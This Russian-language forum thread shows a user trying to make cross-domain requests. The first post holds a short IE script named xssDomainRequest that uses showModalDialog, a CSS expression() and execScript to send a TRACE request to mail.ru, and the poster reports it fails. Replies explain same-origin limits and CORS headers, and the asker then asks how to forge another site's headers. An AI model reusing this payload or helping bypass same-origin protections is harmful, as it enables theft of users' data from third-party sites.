Подскажите пожалуста, каким образом можно отправить AJAX запрос на сторонний URL. Я нашел вариант для Internet Explorer:

<script>
function xssDomainRequest(){
var exampleCode = "var xmlHttp = new ActiveXObject('Microsoft.XMLHTTP');xmlHttp.open('T RACE','http://mail.ru',false);xmlHttp.send();xmlDoc=xmlHttp.resp onseText;alert(xmlDoc);";
cExampleCode = encodeURIComponent(exampleCode + ';top.close()');
var readyCode = 'font-size:expression(execScript(decodeURIComponent("' + cExampleCode + '")))';
showModalDialog('http://www.mail.ru',null,readyCode);}
</script>

Все вроде логично, но IE выдает ошибку, недопустимый аргумент, походу он не пропускает expression в showModalDialog. Что делать???:)

на сторонний сайт нельзя ajax.

Не ужели еще ничего не придумали на эту тему??

Как раз на эту тему писал:
http://raz0r.name/articles/html-js-vzaimodejstvie-s-udalennym-serverom/

Тоесть, как я понял, до выхода IE8 с поддержкой XDomainRequest выполнить запрос, типо trace, не получится, так?

почему же только IE, в FireFox 3 уже есть поддержка междоменных вызовов посредством AJAX

Firefox3 - это гуд, я уже даже разобрался, че да как. А уязвимость в IE с showModalDialog походу прикрыли((

Не, с ним тоже трабл, при попытке сделать запрос на другой домен, он его не грузит, а в консоли ошибок пишет, что ошибка системы безопасности, содержимое "мой адрес" не имеет права загружать данные с "запрашиваемый адрес".

ты точно разобрался? Скрипт, которому ты отправляешь запрос, должен возвращать специальный заголовок.

Спасибо, все работает. Теперь думаю, каким бы образом фальсифицировать заголок стороннего сайта. Есть идеи на этот счет?